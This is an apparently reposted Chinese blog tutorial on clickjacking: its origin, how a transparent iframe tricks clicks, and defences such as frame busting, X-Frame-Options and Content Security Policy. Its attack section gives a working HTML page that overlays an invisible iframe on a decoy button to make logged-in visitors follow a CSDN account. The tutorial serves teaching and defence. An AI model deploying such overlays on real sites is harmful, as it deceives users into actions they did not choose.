目錄

簡介

原理

攻擊

防御

frame busting

X-Frame-Options

Content Security Policy

NoScript擴展

拓展

參考

---

簡介

2008年，安全專家Robert Hansen 與Jeremiah Grossman發現了一種被他們稱為點擊劫持(ClickJacking)的攻擊。他們準備在OWASP安全大會上公布并進行演示，但是由于很多平臺都中了招，包括Adobe在內的廠商要求在漏洞修補前不要公開此問題。

原理

點擊劫持是視覺欺騙，用戶只看到了底層頁面，與頁面進行交互時卻是與上層頁面在交互。這是由于透明的iframe造成的，通過控制iframe的位置，導致上層頁面的按鈕等覆蓋到下層上。

點擊劫持，原理示意圖

注：紅色按鈕（上層頁面中的）應該是完全覆蓋在黃色按鈕（底層頁面中的），由于看的不是很清楚，我稍微錯位了一下。

攻擊

<html> <head> <title> 來和鹿鳴Lumi互動吧！！！ </title> <head> <style> iframe {width: 1440px;height: 900px;position: absolute;top: 30px;left: 450px;z-index: 2;-moz-opacity: 0;opacity: 0;filter: alpha(opacity=0); } </style> </head> </head> <body> <center> <div> <img src="https://ss1.bdstatic.com/70cFvXSh_Q1YnxGkpoWK1HF6hhy/it/u=1242777858,3501957407&fm=11&gp=0.jpg" height="60%"> <br> <button>點擊進行互動</button> </div> </center> <iframe src="https://blog.csdn.net/lady_killer9" scrolling="no"></iframe></body> </html>

opacity為0.5，即上層頁面為半透明狀態。

opacity為0.5時

可以看到關注按鈕覆蓋在了下方的點擊進行互動按鈕上。

opacity為0時

?此時，上層頁面完全無法看見，這時如果你登錄csdn后點擊"點擊進行互動"按鈕，就會關注我。

防御

frame busting

js編寫的，防御效果不好，可繞過。

X-Frame-Options

部分瀏覽器支持

DENY：禁止iframe，瀏覽器拒絕當前頁面加載任何iframe頁面。
SAMEORIGIN：只允許相同域名下的網頁iframe，同源政策保護。
ALLOW-FROM: 白名單限制。

Content Security Policy

"網頁安全政策"（Content Security Policy，縮寫 CSP），一種白名單制度。

NoScript擴展

火狐官方回答

拓展

除了這種點擊劫持，還有拖拽劫持，手機端觸屏劫持，原理都一樣。

參考

《白帽子講Web安全》

更多內容查看：網絡安全-自學筆記

喜歡本文的請動動小手點個贊，收藏一下，有問題請下方評論，轉載請注明出處，并附有原文鏈接，謝謝！如有侵權，請及時聯系。如果您感覺有所收獲，自愿打賞，可選擇支付寶18833895206（小于），您的支持是我不斷更新的動力。

總結

以上是生活随笔為你收集整理的网络安全-点击劫持（ClickJacking）的原理、攻击及防御的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。